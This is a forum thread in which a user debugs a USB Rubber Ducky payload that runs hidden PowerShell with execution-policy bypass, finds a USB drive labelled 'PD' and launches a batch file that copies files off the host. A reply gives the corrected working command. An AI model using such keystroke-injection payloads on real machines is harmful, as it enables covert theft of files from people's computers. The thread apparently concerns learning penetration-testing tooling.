Jump to content
Sign in to follow this  
grahamjohnson77

Powershell Find Drive by Label Not Working

Recommended Posts

All,

I have started to learn the rubber ducky and followed the vblog on exfiltration of files from a system using the ducky. I built everything and all components are working except the initial drive find in PowerShell. Learning from vblog: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained - Love these guys (shout out from Italy via Ireland!)

For testing only (while I get more experience of the ducky), I have an external USB drive that I am using (e.g. F:\). That contains all the required files for d.bat. e.bat and the cscript i.vbs. Files are copied to slurp folder here. Then I plug in my rubber ducky to start the attack. That ducky script looks for the drive with Label "PD" (which is F:\) for the required d.bat to start the attack.

Using my testing/debugging, I know that if I run the powershell cmd directly in a powershell CLI, the attack works no issues. Then, I can hard code the drive letter of F:\ and again, no issues. My slurp has the extracted pdf files. The only thing I can think it could be is the System is Locale Italian with Italian keyboard. But I am compiling it with ITALIAN encoder and works for other ways.


REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "$u=gwmi win32_volume -Filter Label="`"PD"`";cd $u.Name;.\d.cmd"

REM This one is working directly from Run -> Start!!!
REM STRING powershell -NoP -NonI -W Normal -Exec Bypass "F:\d.cmd"
REM This one is working directly from Run -> Start!!! But Not Ducky!
REM STRING powershell "$u=gwmi Win32_Volume|?{$_.Label -eq'PD'}|select name;cd $u.name;.\d.cmd"

REM This one is working but I don't want to hard code it obviously! Just to try and confirm is working as expected!
REM STRING powershell -NoP -NonI -W H -Exec Bypass "e:\d.cmd"

REM My latest attempt! Still no luck!
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"
ENTER

I did see some errors about the select from win32_volume not valid etc. last night during troubleshooting so i think i would be seeing some PowerShell error if the string format was incorrect etc.

Any ideas of how to troubleshoot this line only from the Rubber Ducky payload when Ducky is running? (again, I can put it into PowerShell directly and works!)

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$u=(gwmi win32_volume -Filter "Label='PD'").Name;cd $u.Name;.\d.cmd;"

Thank you.

Share this post


Link to post
Share on other sites

Try this:

powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;"

You passed the name already.  No need to reference it in the variable.  Surprised it even works in your stand alone tests unless you are already in the folder with the d.cmd file.

Also, to remove the extra (") that might be terminating the string you can use "{}" for the filter statement in powershell.

 

Edited by PoSHMagiC0de
Forgot the C parameter.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...